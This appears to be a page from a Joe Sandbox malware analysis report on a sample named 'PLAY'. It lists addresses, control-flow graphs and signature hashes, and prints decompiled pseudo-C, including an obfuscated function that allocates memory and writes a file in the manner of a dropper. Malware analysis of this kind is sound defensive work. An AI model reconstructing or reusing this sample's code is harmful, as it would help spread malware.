          0x00ae9a2d
          0x00ae9a34
          0x00ae9a3b
          0x00ae9a45
          0x00ae9a4f
          0x00ae9a59
          0x00ae9a63
          0x00ae9a69
          0x00ae9a6f
          0x00ae9a74
          0x00ae9a77
          0x00ae9a79
          0x00ae9a7f
          0x00ae9a82
          0x00ae9a8f
          0x00ae9a91
          0x00ae9a94
          0x00ae9a97
          0x00ae9a9d
          0x00ae9aa3
          0x00ae9aa3
          0x00ae9aa6
          0x00ae9aa9
          0x00ae9aa9
          0x00ae9aa3
          0x00ae9aae
          0x00ae9ab8
          0x00ae9aba
          0x00ae9ac0
          0x00ae9ac0
          0x00ae9ac3
          0x00ae9ac3
          0x00ae9ac0
          0x00ae9ad3
          0x00ae9ad8
          0x00ae9adc
          0x00ae9aee
          0x00ae9af9
          0x00ae9afe
          0x00ae9b08
          0x00ae9b0e
          0x00ae9b17
          0x00ae9b23
          0x00ae9b2f
          0x00ae9b3b
          0x00ae9b48
          0x00ae9b56
          0x00ae9b64
          0x00ae9b72
          0x00ae9b80
          0x00ae9b8e
          0x00ae9b92
          0x00ae9b98
          0x00ae9b98
          0x00ae9ba0
          0x00ae9ba2
          0x00ae9ba2
          0x00ae9bab
          0x00ae9bb6
          0x00ae9bb8
          0x00ae9bb9
          0x00ae9bba
          0x00ae9bc1
          0x00ae9bc2
          0x00ae9bc3
          0x00ae9bc7
          0x00ae9bcc
          0x00ae9bcd
          0x00ae9bd5
          0x00ae9bdc
          0x00000000
          0x00000000
          0x00ae9bfd
          0x00ae9c03
          0x00ae9c0c
          0x00ae9c14
          0x00ae9c1e
          0x00ae9c24
          0x00ae9c26
          0x00ae9c2c
          0x00ae9c35
          0x00aea09b
          0x00aea0a1
          0x00aea0b1
          0x00aea0b5
          0x00aea0bb
          0x00aea0c8
          0x00aea0cb
          0x00aea0d1
          0x00ae9c44
          0x00ae9c44
          0x00ae9c4a
          0x00ae9c4f
          0x00aea062
          0x00000000
          0x00ae9c55
          0x00ae9c58
          0x00ae9d78
          0x00ae9d9c
          0x00ae9dae
          0x00ae9d7a
          0x00ae9d85
          0x00ae9d85
          0x00ae9db0
          0x00ae9dc2
          0x00ae9dcc
          0x00ae9dd9
          0x00ae9de6
          0x00ae9ded
          0x00ae9df7
          0x00ae9df8
          0x00ae9dfe
          0x00ae9e05
          0x00ae9e11
          0x00ae9e19
          0x00ae9e23
          0x00ae9e2a
          0x00ae9e30
          0x00ae9e3a
          0x00ae9e40
          0x00ae9e54
          0x00ae9e59
          0x00ae9e66
          0x00ae9e69
          0x00ae9e6f
          0x00ae9e7d
          0x00ae9e85
          0x00ae9ebe
          0x00ae9ebf
          0x00ae9ec5
          0x00ae9ed2
          0x00ae9ed5
          0x00ae9edd
          0x00ae9f15
          0x00ae9f1a
          0x00ae9edf
          0x00ae9ee6
          0x00ae9ef1
          0x00ae9f01
          0x00ae9f01
          0x00ae9f1d
          0x00ae9f2b
          0x00ae9f34
          0x00ae9f3e
          0x00ae9f44
          0x00ae9f47
          0x00ae9f53
          0x00ae9f5a
          0x00ae9f63
          0x00ae9f65
          0x00ae9f6c
          0x00ae9f7b
          0x00ae9f8c
          0x00ae9f8e
          0x00ae9f93
          0x00ae9f99
          0x00ae9f9b
          0x00ae9fa1
          0x00ae9fa4
          0x00ae9fb0
          0x00ae9fbd
          0x00ae9fca
          0x00ae9fcd
          0x00ae9fcf
          0x00ae9fd8
          0x00aea00c
          0x00aea00d
          0x00aea01b
          0x00aea028
          0x00aea037
          0x00aea039
          0x00aea040
          0x00aea046
          0x00aea04c
          0x00aea05e
          0x00ae9fda
          0x00ae9fe1
          0x00ae9fe2
          0x00ae9fe8
          0x00ae9fee
          0x00ae9ff8
          0x00ae9ff8
          0x00aea068
          0x00aea068
          0x00aea074
          0x00aea07b
          0x00aea087
          0x00aea08d
          0x00aea094
          0x00000000
          0x00ae9e8f
          0x00ae9e95
          0x00ae9ea1
          0x00ae9ea1
          0x00ae9c5e
          0x00ae9c61
          0x00ae9c64
          0x00ae9c66
          0x00ae9c66
          0x00ae9c58
          0x00ae9c4f
          0x00aea0d7
          0x00aea0d7
          0x00aea0de
          0x00000000
          0x00aea0e4
          0x00aea0f2
          0x00aea100
          0x00aea106
          0x00aea10c
          0x00aea112
          0x00aea118
          0x00aea126
          0x00aea129
          0x00aea129
          0x00aea130
          0x00aea130
          0x00aea112
          0x00aea14d
          0x00aea14d
          0x00000000
          0x00aea0de
          0x00ae9bde
          0x00ae9bdf
          0x00ae9be2
          0x00ae9be4
          0x00ae9be6
          0x00ae9bea
          0x00ae98aa
          0x00ae98aa
          0x00ae98b4
          0x00ae98b5
          0x00ae98b6
          0x00ae98ba
          0x00ae98bc
          0x00ae98c3
          0x00ae98c6
          0x00ae98ca
          0x00ae98ca
          0x00000000

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: 8$h3xGKYS$recent
          • API String ID: 0-811218321
          • Opcode ID: 92f4a36ecae67a914370217459f2ed4f3bca7d73037df3d2147e5a41718d084d
          • Instruction ID: b1be01db128b9294434c2dbef20c4dc6fd3f27008061d4fbc651ef14f6fe507e
          • Opcode Fuzzy Hash: 92f4a36ecae67a914370217459f2ed4f3bca7d73037df3d2147e5a41718d084d
          • Instruction Fuzzy Hash: 2C225A75D042A98ACF21DB25CC997EDBBB0AF66304F0442EAD48CA7292DB354EC5CF15
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFBF33 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1112 afbf33-afbf48 GetLastError 1113 afbf4a-afbf54 call afe25b 1112->1113 1114 afbf66-afbf70 call afe29a 1112->1114 1119 afbf56-afbf59 1113->1119 1120 afbf61 1113->1120 1121 afbf5b 1114->1121 1122 afbf72-afbf79 call afc42c 1114->1122 1119->1121 1124 afbfd3 1119->1124 1120->1114 1125 afbf5d-afbf5f 1121->1125 1126 afbf7e-afbf84 1122->1126 1127 afbfd5-afbfe2 SetLastError 1124->1127 1125->1127 1128 afbf9d-afbfab call afe29a 1126->1128 1129 afbf86-afbf94 call afe29a 1126->1129 1130 afbfea-afbfef call afb86b 1127->1130 1131 afbfe4-afbfe9 1127->1131 1139 afbfbe-afbfd0 call afbd61 call afc2ce 1128->1139 1140 afbfad-afbfbc call afe29a 1128->1140 1138 afbf95-afbf9b call afc2ce 1129->1138 1138->1125 1139->1124 1140->1138
          C-Code - Quality: 73%
          			E00AFBF33(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t30;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xb0b050; // 0x2
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00AFE29A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t30 = E00AFC42C(_t43, 1, 0x364); // executed
						_t51 = _t30;
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00AFE29A(__eflags,  *0xb0b050, _t51);
							if(__eflags != 0) {
								E00AFBD61(_t51, 0xb0d0f8);
								E00AFC2CE(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00AFE29A(__eflags,  *0xb0b050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00AFE29A(0,  *0xb0b050, 0);
							_push(0);
							L9:
							E00AFC2CE();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00AFE25B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xb0b050; // 0x2
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00AFB86B(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xb0b050; // 0x2
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00AFE29A(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00AFC42C(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00AFE29A(__eflags,  *0xb0b050, _t60);
								if(__eflags != 0) {
									E00AFBD61(_t60, 0xb0d0f8);
									E00AFC2CE(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00AFE29A(__eflags,  *0xb0b050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00AFE29A(__eflags,  *0xb0b050, _t20);
								_push(_t60);
								L25:
								E00AFC2CE();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00AFE25B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xb0b050; // 0x2
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00AFB86B(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xb0b050; // 0x2
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00AFE29A(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00AFC42C(_t43, 1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00AFE29A(__eflags,  *0xb0b050, _t54);
											if(__eflags != 0) {
												E00AFBD61(_t54, 0xb0d0f8);
												E00AFC2CE(0);
												goto L45;
											} else {
												_t40 = 0;
												E00AFE29A(__eflags,  *0xb0b050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00AFE29A(0,  *0xb0b050, 0);
											_push(0);
											L41:
											E00AFC2CE();
											goto L36;
										}
									}
								} else {
									_t54 = E00AFE25B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xb0b050; // 0x2
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}
























          0x00afbf33
          0x00afbf33
          0x00afbf3e
          0x00afbf40
          0x00afbf45
          0x00afbf48
          0x00afbf66
          0x00afbf69
          0x00afbf6e
          0x00afbf70
          0x00000000
          0x00afbf72
          0x00afbf79
          0x00afbf7e
          0x00afbf81
          0x00afbf82
          0x00afbf84
          0x00afbfa9
          0x00afbfab
          0x00afbfc4
          0x00afbfcb
          0x00afbfd0
          0x00000000
          0x00afbfad
          0x00afbfad
          0x00afbfb6
          0x00afbfbb
          0x00000000
          0x00afbfbb
          0x00afbf86
          0x00afbf86
          0x00afbf86
          0x00afbf8f
          0x00afbf94
          0x00afbf95
          0x00afbf95
          0x00afbf9a
          0x00000000
          0x00afbf9a
          0x00afbf84
          0x00afbf4a
          0x00afbf50
          0x00afbf54
          0x00afbf61
          0x00000000
          0x00afbf56
          0x00afbf59
          0x00afbfd3
          0x00afbfd3
          0x00afbf5b
          0x00afbf5b
          0x00afbf5b
          0x00afbf5d
          0x00afbf5d
          0x00afbf5d
          0x00afbf59
          0x00afbf54
          0x00afbfd6
          0x00afbfde
          0x00afbfe0
          0x00afbfe2
          0x00afbfea
          0x00afbfef
          0x00afbff0
          0x00afbff5
          0x00afbff6
          0x00afbff9
          0x00afc013
          0x00afc016
          0x00afc01b
          0x00afc01d
          0x00000000
          0x00afc01f
          0x00afc02b
          0x00afc02e
          0x00afc02f
          0x00afc031
          0x00afc054
          0x00afc056
          0x00afc06d
          0x00afc074
          0x00afc079
          0x00000000
          0x00afc058
          0x00afc05f
          0x00afc064
          0x00000000
          0x00afc064
          0x00afc033
          0x00afc03a
          0x00afc03f
          0x00afc040
          0x00afc040
          0x00afc045
          0x00000000
          0x00afc045
          0x00afc031
          0x00afbffb
          0x00afc001
          0x00afc003
          0x00afc005
          0x00afc00e
          0x00000000
          0x00afc007
          0x00afc007
          0x00afc00a
          0x00afc084
          0x00afc084
          0x00afc089
          0x00afc08c
          0x00afc08d
          0x00afc08e
          0x00afc095
          0x00afc097
          0x00afc09c
          0x00afc09f
          0x00afc0bd
          0x00afc0c0
          0x00afc0c5
          0x00afc0c7
          0x00000000
          0x00afc0c9
          0x00afc0d5
          0x00afc0d9
          0x00afc0db
          0x00afc100
          0x00afc102
          0x00afc11b
          0x00afc122
          0x00000000
          0x00afc104
          0x00afc104
          0x00afc10d
          0x00afc112
          0x00000000
          0x00afc112
          0x00afc0dd
          0x00afc0dd
          0x00afc0dd
          0x00afc0e6
          0x00afc0eb
          0x00afc0ec
          0x00afc0ec
          0x00000000
          0x00afc0f1
          0x00afc0db
          0x00afc0a1
          0x00afc0a7
          0x00afc0a9
          0x00afc0ab
          0x00afc0b8
          0x00000000
          0x00afc0ad
          0x00afc0ad
          0x00afc0b0
          0x00afc12a
          0x00afc12a
          0x00afc0b2
          0x00afc0b2
          0x00afc0b2
          0x00afc0b2
          0x00afc0b4
          0x00afc0b4
          0x00afc0b4
          0x00afc0b0
          0x00afc0ab
          0x00afc12d
          0x00afc135
          0x00afc137
          0x00afc137
          0x00afc13e
          0x00afc00c
          0x00afc07c
          0x00afc07c
          0x00afc07e
          0x00000000
          0x00afc080
          0x00afc083
          0x00afc083
          0x00afc07e
          0x00afc00a
          0x00afc005
          0x00afbfe4
          0x00afbfe9
          0x00afbfe9

          APIs
          • GetLastError.KERNEL32(?,?,00000087,00AFA504,00AF3D63), ref: 00AFBF38
          • _free.LIBCMT ref: 00AFBF95
          • _free.LIBCMT ref: 00AFBFCB
          • SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,00000087,00AFA504,00AF3D63), ref: 00AFBFD6
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorLast_free
          • String ID:
          • API String ID: 2283115069-0
          • Opcode ID: e40a52531b3aa2141db133fa15258c47430b7aebefa321c8c6ac990a7261f787
          • Instruction ID: 8228fc81eeccb70541e232140a49f20f8531da1794a053e772f30fb2e50ba6ae
          • Opcode Fuzzy Hash: e40a52531b3aa2141db133fa15258c47430b7aebefa321c8c6ac990a7261f787
          • Instruction Fuzzy Hash: D511A07622460D6ADA11A7F5DE96E7F276AABD13B1B240224F729931E1FF20CC055630
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE9454 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 296COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1149 ae9454-ae945c 1150 ae945e-ae9462 1149->1150 1151 ae946b-ae952b 1149->1151 1150->1151 1152 ae952d-ae953f 1151->1152 1153 ae9565 1151->1153 1154 ae9542-ae9561 1152->1154 1155 ae9568-ae956e 1153->1155 1154->1154 1156 ae9563 1154->1156 1157 ae95a8-ae95b7 1155->1157 1158 ae9570-ae9581 1155->1158 1156->1155 1160 ae95bf-ae95c8 call ae95cf 1157->1160 1161 ae95b9 1157->1161 1159 ae9586-ae9599 1158->1159 1159->1159 1162 ae959b-ae95a5 1159->1162 1165 ae95ca-ae95d3 1160->1165 1166 ae9619-ae9649 VirtualAlloc 1160->1166 1161->1160 1162->1157 1167 ae965f-ae966d 1166->1167 1168 ae964b-ae965e call af7b30 1166->1168 1171 ae966f-ae967a 1167->1171 1172 ae967c 1167->1172 1174 ae967f-ae9691 1171->1174 1172->1174 1175 ae9697-ae96bd 1174->1175 1175->1175 1176 ae96bf-ae96ed call afa532 call b02a00 1175->1176 1181 ae96f0-ae96f9 1176->1181 1181->1181 1182 ae96fb-ae9705 1181->1182 1183 ae9707-ae972f call aed7d0 call afa596 1182->1183 1184 ae9732-ae974f call aed7d0 1182->1184 1183->1184 1190 ae9756-ae976a 1184->1190 1191 ae9751-ae9754 1184->1191 1193 ae976d-ae9783 call afa596 1190->1193 1191->1190 1191->1193 1196 ae97ab 1193->1196 1197 ae9785-ae9789 1193->1197 1198 ae97b2-ae97e1 call af8bb0 call aee230 1196->1198 1197->1196 1199 ae978b-ae97a9 1197->1199 1204 ae97ec-ae97fd call aee380 1198->1204 1205 ae97e3-ae97ea 1198->1205 1199->1198 1206 ae9800-ae9809 1204->1206 1205->1206 1209 ae980b 1206->1209 1210 ae9811-ae981a call ae981c 1206->1210 1209->1210 1213 ae981c-ae9820 1210->1213 1214 ae9836-ae983e FindCloseChangeNotification 1210->1214 1215 ae9846-ae985c call af7b30 1214->1215 1216 ae9841 call aee110 1214->1216 1216->1215
          C-Code - Quality: 58%
          			E00AE9454(void* __eax, void* __ebx, signed int __ecx, intOrPtr* __edx, void* __edi, void* __fp0) {
				void* _t97;
				intOrPtr* _t99;
				void* _t100;
				signed int _t105;
				signed short _t108;
				signed char _t111;
				void* _t112;
				void* _t122;
				void* _t123;
				void* _t138;
				intOrPtr _t143;
				intOrPtr _t144;
				signed int _t150;
				void* _t151;
				long _t153;
				long _t160;
				signed char _t179;
				intOrPtr _t180;
				void* _t181;
				void* _t189;
				void* _t191;
				void** _t192;
				long _t194;
				long _t199;
				intOrPtr _t201;
				void* _t205;
				signed int _t206;
				signed int _t209;
				void* _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t217;
				void* _t218;
				intOrPtr* _t219;
				void* _t235;
				void* _t237;

				_t237 = __fp0;
				asm("sahf");
				 *__ecx =  *__ecx ^ _t209;
				if( *__ecx == 0) {
					asm("out dx, eax");
					_t206 = _t206 +  *__edx;
					 *(__ebx - 1 + 0x1fbdf7ed) =  *(__ebx - 1 + 0x1fbdf7ed) & __ecx;
					asm("invalid");
				}
				asm("movups xmm0, [0xb08e88]");
				asm("movups xmm1, [0xb08e98]");
				 *((short*)(_t206 - 0xd0)) = 0x30bf;
				 *((intOrPtr*)(_t206 - 0x60)) = 0x222;
				 *((short*)(_t206 - 0xec)) = 0x3418;
				_t199 = 0xcd;
				 *((char*)(_t206 - 0xa3)) = 0;
				_t191 = 0x2cb3;
				 *((intOrPtr*)(_t206 - 0xc)) = 0;
				 *((char*)(_t206 - 0xa4)) = 0;
				 *((char*)(_t206 - 0xa3)) = 0;
				asm("movups [ebp-0x90], xmm0");
				 *(_t206 - 0x6c) = 0x1893;
				asm("movq xmm0, [0xb08ea8]");
				asm("movd eax, xmm1");
				asm("movq [ebp-0x5c], xmm0");
				_t97 = 0xbadbae;
				 *((intOrPtr*)(_t206 - 0x78)) = 0x78b;
				 *((char*)(_t206 - 0x43)) = 0xcd;
				 *((char*)(_t206 - 0x41)) = 0xe5;
				 *(_t206 - 0x46) = 0xf6;
				 *((char*)(_t206 - 0x45)) = 0xb6;
				 *((intOrPtr*)(_t206 - 0x7c)) = 1;
				 *(_t206 - 0x64) = 0 >> 0x10;
				 *(_t206 - 0x68) = ( *(_t206 - 0x5c) >> 0x18) + 1;
				 *(_t206 - 0x40) = 0;
				 *(_t206 - 0x70) = 0xffff;
				asm("movups [ebp-0xa0], xmm1");
				 *(_t206 - 0x9e) = 0xbadbae;
				if(0xcd <= 0x70) {
					_t179 =  *(_t206 - 0x58);
				} else {
					_t205 = 0x5d;
					 *((intOrPtr*)(_t206 - 0x60)) = 0x2bfa1;
					_t189 =  *(_t206 - 0x58);
					do {
						_t138 = _t97 +  *(_t206 - 0x70);
						_t189 = _t189 - 1;
						 *(_t206 - 0x64) = _t138;
						 *(_t206 - 0x9e) = _t138;
						_t97 =  *(_t206 - 0x64);
						_t205 = _t205 - 1;
					} while (_t205 != 0);
				}
				_t150 = _t179 & 0x000000ff;
				if(_t150 > 0x6d) {
					_t99 =  *((intOrPtr*)(_t206 - 0x8e));
					_t150 = _t150 + 0xffffff93;
					_t179 = 0x1893;
					_t143 = 0;
					_t199 = 0xffff;
					L10:
					_t179 = _t179 + 0xffffffff;
					asm("adc ebx, 0xffffffff");
					 *((char*)(_t206 - 0x41)) =  *((char*)(_t206 - 0x41)) + 0xe0;
					L11:
					asm("loopne 0x68");
					_t191 = _t191 + _t199;
					_t99 = _t99 + _t199;
					_t150 = _t150 - 1;
					if(_t150 != 0) {
						goto L10;
					}
					 *((short*)(_t206 - 0x8e)) = _t99;
					 *((intOrPtr*)(_t206 - 0xc)) = _t143;
					 *(_t206 - 0x6c) = _t179;
				}
				_t210 = _t209 - 0xc;
				asm("in al, dx");
				_t143 = 0xba000047;
				_pop(ss);
				_pop(_t99);
				 *_t99 =  *_t99 + _t99;
				_t235 = _t179 - _t150;
				if(_t235 <= 0) {
					_t210 = _t210 + 0xa4;
				}
				_t209 = _t210 + 0xc;
				L19();
				asm("aaa");
				if(_t235 >= 0) {
					_t100 = VirtualAlloc(0, 0xffff, 0x1000, 4); // executed
					_t192 = _t100;
					 *(_t206 - 0x70) = _t192;
					 *(_t206 - 0xc0) =  *((intOrPtr*)(_t206 - 0x8e)) -  *((intOrPtr*)(_t206 - 0xa0)) +  *((intOrPtr*)(_t206 - 0xec));
					if(_t192 != 0) {
						_t180 =  *((intOrPtr*)(_t206 - 0x60));
						if( *(_t206 - 0x64) >= 0x4146) {
							_t105 =  *(_t206 - 0x5c);
						} else {
							_t105 =  *(_t206 - 0x68) + _t180 +  *((intOrPtr*)(_t206 - 0xd0));
						}
						_t201 =  *((intOrPtr*)(_t206 - 0x8c));
						_t151 = 0x786;
						_t144 =  *((intOrPtr*)(_t206 - 0x43));
						 *(_t206 - 0x68) = _t105;
						 *_t192 = 0;
						do {
							_t151 = _t151 + 1;
							_t201 = _t201 + 0xffff;
							_t144 = _t144 + 1;
							_t108 =  *(_t206 - 0xc0) + _t180;
							 *(_t206 - 0x58) = _t108 & 0x0000ffff;
							 *(_t206 - 0xc0) = _t108;
						} while (_t151 < 0x78b);
						_t194 =  *(_t206 - 0x70);
						E00AFA532(_t194, 0x7fff,  *((intOrPtr*)(_t206 - 0x74)));
						_t211 = _t209 + 0xc;
						_t111 = E00B02A00( *(_t206 - 0x6c),  *((intOrPtr*)(_t206 - 0xc)),  *(_t206 - 0x6c),  *((intOrPtr*)(_t206 - 0xc)));
						_t202 =  *(_t206 - 0x64);
						_t153 = _t194;
						 *((intOrPtr*)(_t206 - 0x74)) = _t180;
						 *(_t206 - 0x6c) = _t111;
						_t181 = _t153 + 2;
						do {
							_t112 =  *_t153;
							_t153 = _t153 + 2;
						} while (_t112 != 0);
						if( *((short*)(_t194 + (_t153 - _t181 >> 1) * 2 - 2)) != 0x5c) {
							_push(_t206 - 0x10);
							E00AED7D0(_t144, 0xb0b994, 4, _t194, _t202);
							E00AFA596(_t194, 0x7fff, _t206 - 0x10);
							_t211 = _t211 - 8 + 0x18;
						}
						_push(_t206 - 0x3c);
						E00AED7D0(_t144, 0xb0b944, 0x16, _t194, _t202);
						_t213 = _t211 - 8 + 0xc;
						if( *((char*)(_t206 - 0x45)) != 0 || _t202 != 0) {
							 *((intOrPtr*)(_t206 - 0x78)) = ( *(_t206 - 0x58) & 0x0000ffff) + ( *(_t206 - 0x46) & 0x000000ff) + ( *(_t206 - 0x68) & 0x000000ff);
						}
						E00AFA596(_t194, 0x7fff, _t206 - 0x3c);
						_t214 = _t213 + 0xc;
						if( *((intOrPtr*)(_t206 - 0x74)) > 0 ||  *(_t206 - 0x6c) > 0x66) {
							 *(_t206 - 0x58) = 0;
						} else {
							asm("cdq");
							_t202 = 0x16;
							asm("cdq");
							asm("adc esi, edx");
							asm("adc esi, 0x0");
							 *(_t206 - 0x58) = 0x16;
						}
						_t122 = E00AF8BB0(_t194, _t206 - 0x3c, 0, 0x2c);
						_t160 = _t194;
						_push(0x80);
						_push(4);
						_t123 = E00AEE230(_t122, _t160, 0x40000000, _t194, _t202, _t237); // executed
						_t217 = _t214 + 8 - 8 + 0x14;
						 *(_t206 - 0x58) = _t123;
						if(_t123 != 0xffffffff) {
							_push(_t160);
							_push(_t206 - 0x40);
							_push(0x1f);
							_t123 = E00AEE380(_t123, _t144, _t123,  *((intOrPtr*)(_t206 - 0x80)), _t194, _t202); // executed
							_t217 = _t217 + 0xc;
						} else {
							 *((intOrPtr*)(_t206 - 0x7c)) = 0xfffffffe;
						}
						_t218 = _t217 - 0x10;
						if(0x79 <= 0x24) {
							_t218 = _t218 + 0x184;
						}
						_t219 = _t218 + 0x10;
						L44();
						_t195 = _t194 - 1;
						if(_t194 - 1 < 0) {
							 *_t123 = _t123 +  *_t123;
							FindCloseChangeNotification( *(_t206 - 0x58)); // executed
							E00AEE110(_t144,  *(_t206 - 0x70), _t195, _t202); // executed
							return E00AF7B30( *(_t206 - 8) ^ _t206, 0x24);
						} else {
							 *_t219 =  *_t219 + 0x14;
							return _t123;
						}
					} else {
						return E00AF7B30( *(_t206 - 8) ^ _t206);
					}
				} else {
					if(_t235 <= 0) {
						goto L11;
					} else {
						asm("adc eax, 0x48393a4");
						 *_t209 =  *_t209 + 0x47;
						return _t99;
					}
				}
			}








































          0x00ae9454
          0x00ae9454
          0x00ae945a
          0x00ae945c
          0x00ae945f
          0x00ae9460
          0x00ae9462
          0x00ae9468
          0x00ae9469
          0x00ae946b
          0x00ae947c
          0x00ae9483
          0x00ae9491
          0x00ae9494
          0x00ae949f
          0x00ae94a2
          0x00ae94a8
          0x00ae94ad
          0x00ae94b2
          0x00ae94b8
          0x00ae94be
          0x00ae94c5
          0x00ae94cc
          0x00ae94d4
          0x00ae94d8
          0x00ae94e8
          0x00ae94e9
          0x00ae94f0
          0x00ae94f3
          0x00ae94f7
          0x00ae94fb
          0x00ae94ff
          0x00ae9506
          0x00ae9509
          0x00ae950c
          0x00ae9513
          0x00ae951a
          0x00ae9521
          0x00ae952b
          0x00ae9565
          0x00ae952d
          0x00ae952d
          0x00ae953c
          0x00ae953f
          0x00ae9542
          0x00ae9542
          0x00ae9546
          0x00ae9548
          0x00ae954b
          0x00ae955b
          0x00ae955e
          0x00ae955e
          0x00ae9563
          0x00ae9568
          0x00ae956e
          0x00ae9570
          0x00ae9577
          0x00ae957a
          0x00ae957f
          0x00ae9581
          0x00ae9586
          0x00ae9586
          0x00ae9589
          0x00ae958c
          0x00ae958f
          0x00ae958f
          0x00ae9591
          0x00ae9593
          0x00ae9596
          0x00ae9599
          0x00000000
          0x00000000
          0x00ae959b
          0x00ae95a2
          0x00ae95a5
          0x00ae95a5
          0x00ae95a8
          0x00ae95a9
          0x00ae95ac
          0x00ae95b1
          0x00ae95b2
          0x00ae95b3
          0x00ae95b5
          0x00ae95b7
          0x00ae95b9
          0x00ae95b9
          0x00ae95bf
          0x00ae95c2
          0x00ae95c7
          0x00ae95c8
          0x00ae9627
          0x00ae9629
          0x00ae963d
          0x00ae9640
          0x00ae9649
          0x00ae9667
          0x00ae966d
          0x00ae967c
          0x00ae966f
          0x00ae9674
          0x00ae9674
          0x00ae967f
          0x00ae9686
          0x00ae968b
          0x00ae968e
          0x00ae9691
          0x00ae9697
          0x00ae969c
          0x00ae969d
          0x00ae96a0
          0x00ae96a8
          0x00ae96ad
          0x00ae96b0
          0x00ae96b7
          0x00ae96c2
          0x00ae96cb
          0x00ae96d3
          0x00ae96dd
          0x00ae96e2
          0x00ae96e5
          0x00ae96e7
          0x00ae96ea
          0x00ae96ed
          0x00ae96f0
          0x00ae96f0
          0x00ae96f3
          0x00ae96f6
          0x00ae9705
          0x00ae970f
          0x00ae9718
          0x00ae972a
          0x00ae972f
          0x00ae972f
          0x00ae973a
          0x00ae9743
          0x00ae9748
          0x00ae974f
          0x00ae976a
          0x00ae976a
          0x00ae9777
          0x00ae977c
          0x00ae9783
